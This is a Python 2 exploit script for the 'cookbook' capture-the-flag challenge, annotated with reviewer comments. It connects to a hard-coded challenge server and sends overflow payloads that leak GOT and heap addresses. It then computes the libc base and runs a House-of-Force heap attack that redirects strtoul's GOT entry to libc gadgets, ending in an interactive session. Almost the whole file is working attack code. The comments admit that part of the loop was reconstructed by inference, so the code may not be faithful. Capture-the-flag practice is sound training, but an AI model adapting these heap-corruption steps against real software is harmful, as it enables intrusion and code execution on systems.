# Python 2 exploit script for the "cookbook" CTF challenge (host and port are
# hard-coded below).  The file was collapsed onto one line at extraction time;
# line breaks are restored here and the `for` loop body is inferred from the
# repeating prompt sequence -- confirm against the original before relying on it.
#
# `codez` is a project-local helper module (not stdlib); from the usage below it
# appears to provide Remote (a line-oriented socket wrapper with read-until,
# sendline and interactive) plus struct-style pack/unpack.
from codez import *
#r = Remote('localhost',1234)
r = Remote('cookbook.bostonkey.party', 5000)
# Answer the first prompt (presumably a name/login prompt) with a fixed string.
r.read('?')
r.sendline("mak")
r.read('=')
# Three rounds through the menu with options 'c', 'n', 'a'; each round answers
# the follow-up prompts with the same name ('garlic') and quantity ('1').
# NOTE(review): loop extent inferred from the prompt pattern -- verify.
for c in ['c','n','a']:
    r.read('[')
    r.sendline(c)
    r.read('?')
    r.sendline('garlic')
    r.read(':')
    r.sendline('1')
# Stage 1 -- info leak.  900 filler bytes, then one native 32-bit word
# (0x804D00C - 8), then 12 NUL bytes.  The 900-byte length and the 0x804Dxxx
# addresses are tuned to this specific binary; fixed addresses like these only
# work when the target is loaded at a constant base (i.e. a non-PIE build --
# TODO confirm).
p = 'A'*900 + pack('I',0x804D00C-8) + "\x00"*0xc
r.read('[')
r.sendline('i')
r.sendline(p)
r.read('uit')
r.sendline('p')
r.read('A');r.read('-')
# Read up to the next ':' and unpack the first 64 bytes as 16 native 32-bit
# words.  `64/4` is Python 2 integer division (== 16).
got_leak=unpack('I'*(64/4),r.read(':')[:64])
print '--- the leak -- '
print map(hex,got_leak)
# Stage 2 -- same shape of payload, different address (0x804D0AC - 8).
# `p =p =` is a redundant chained assignment; harmless but worth cleaning up.
p =p = 'A'*900 + pack('I',0x804D0AC -8) + "\x00"*0xc
r.read('[')
r.sendline('i')
r.sendline(p)
r.read('uit')
r.sendline('p')
r.read('A');r.read('-')
leak=r.read(':')
# First 4 leaked bytes are treated as a pointer the author calls `top`.
top = unpack('I',leak[:4])[0]
# Constant derived from a fixed address; the name says it is the GOT slot
# of strtoul in the target binary (author's claim, not verifiable here).
strtoul_got = 0x804D038 - 5840 - 8
# Distance from the leaked `top` to the computed target, wrapped to an
# unsigned 32-bit value: pack as signed ('i'), unpack as unsigned ('I').
# "hof" is the author's label for the final stage below.
hof_size = unpack('I',pack('i',(strtoul_got - 8 ) - top))[0]
# libc base = first leaked word minus a build-specific offset (0x13f210).
# This offset is only valid for the libc shipped with the challenge.
libc = got_leak[0] - 0x13f210
print '[*] top',hex(top)
print '[*] libc',hex(libc)
print '[*] hof size',hex(hof_size)
# Stage 3 -- same address as stage 2, but the trailer is 0x40 bytes of 0xff
# instead of 12 NUL bytes.
p =p = 'A'*900 + pack('I',0x804D0AC -8) + "\xff"*0x40
r.read('[')
r.sendline('i')
r.sendline(p)
r.read('uit')
# libc + 0x00112e49 is used again below as the address sent in the 'g' step.
print 'pivot',hex(libc+0x00112e49)
## hof time...
# Pauses for operator input before the final stage (a manual breakpoint).
raw_input('x')
r.read('[')
r.sendline('q')
# Three 'g' menu interactions:
#   1. a hex-formatted size string built from hof_size,
#   2. the line "5" followed by the packed libc+0x00112e49 address,
#   3. five packed 32-bit words: two libc-relative addresses, the marker
#      0x41424344 ("DCBA"/"ABCD" depending on byte order, looks like a
#      placeholder), and two zeros.
r.read('[')
r.sendline('g')
r.read(':')
r.sendline(("0x%x"%hof_size))
r.read('is')
r.read('[')
r.sendline('g')
r.read(':')
r.sendline("5\n"+pack('I',libc+0x00112e49))
r.read('[')
r.sendline('g')
r.read(':')
r.sendline(pack('IIIII',libc+0xb37b0,0x41424344,libc+0x15f5db,0,0))
# Hand the open connection to the user.
r.interactive()